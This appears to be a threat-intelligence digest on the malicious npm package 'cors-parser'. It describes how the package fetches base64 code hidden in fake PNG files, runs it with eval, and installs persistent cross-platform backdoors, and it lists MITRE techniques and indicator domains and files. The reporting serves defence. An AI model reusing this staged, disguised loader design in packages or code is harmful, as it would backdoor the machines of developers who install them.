Threat Research

‘cors-parser’ npm package hides cross-platform backdoor in PNG files

Cyware

cors-parser is an npm package that masks a cross-platform backdoor inside seemingly ordinary PNG files. Researchers show how the first-stage code downloads initial.png, decodes further payloads, and installs platform-specific backdoors that auto-start on reboot or at specific events.
#cors-parser #SilverSparrow

Keypoints

  • The cors-parser package versions 1.0.0 to 3.0.1 contain a minimal index.js that downloads an external PNG-like file (initial.png) from api.jz-aws.info.
  • The initial.png is not a real image; it contains a large base64-encoded string that yields further NodeJS instructions to pull a stage-2 payload from the same domain.
  • Stage-2 payloads are platform-specific: Windows downloads DLLs via load.png and wait.png, while Unix-like systems fetch binaries such as manner.png or middle.png based on architecture.
  • Downloaded binaries are configured to run as background processes and persist via startup mechanisms (Windows Run registry keys; Unix cronjobs or scheduled tasks).
  • The operation relies on primitive steganography by disguising code as PNGs and altering file extensions to mislead users and basic security tooling.
  • The npm package has been taken down, the related domain (jz-aws.info) is blocked, and antivirus tooling labels the Windows/macOS payloads as a backdoor trojan (“Silver”).

MITRE Techniques

  • [T1105] Ingress Tool Transfer – The code downloads an ‘initial.png’ file from an external server. “The code downloads, what appears to be a simple PNG (image) from an external server.”
  • [T1027] Obfuscated/Compressed Files and Information – An initial.png contains a large base64-encoded string that yields the next stage of payloads. “a large base64-encoded string — just more NodeJS instructions that download stage 2 payload from ‘api.jz-aws.info’.”
  • [T1059.007] JavaScript – The index.js is a JavaScript entry that decodes and executes decoded payloads via eval. “eval(plain)”
  • [T1036] Masquerading – File extensions are changed to “.png” to masquerade text/code as images. “the threat actor’s act of changing file extensions to “.png” (when these are really text files containing code).”
  • [T1547.001] Boot or Logon Autostart Execution – The dropped payloads are configured to launch at startup, e.g., through registry keys. “register autorun” and related commands show persistence mechanisms.
  • [T1053] Scheduled Task/Job – On Unix, downloaded payloads are added as a cronjob or scheduled task to launch at boot or specific events. “downloaded binaries were added as a ‘cronjob’ or scheduled task to the operating system…”

Indicators of Compromise

  • [Domain] api.jz-aws.info – used to host initial.png and stage-2 payloads; example: initial.png fetched from this domain.
  • [Domain] jz-aws.info – associated domain (blocked/defanged in article context); example: api calls reference the domain and its subdomains.
  • [File] initial.png – first-stage payload carrier downloaded from the remote server.
  • [File] load.png – Windows stage-2 payload (DLL) disguised as a PNG.
  • [File] wait.png – Windows stage-2 payload (DLL) disguised as a PNG.
  • [File] manner.png / middle.png / list.png – Unix/macOS/architecture-specific payloads disguised as PNGs.

Read more: https://www.sonatype.com/blog/cors-parser-npm-package-hides-cross-platform-backdoor-in-png-files

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint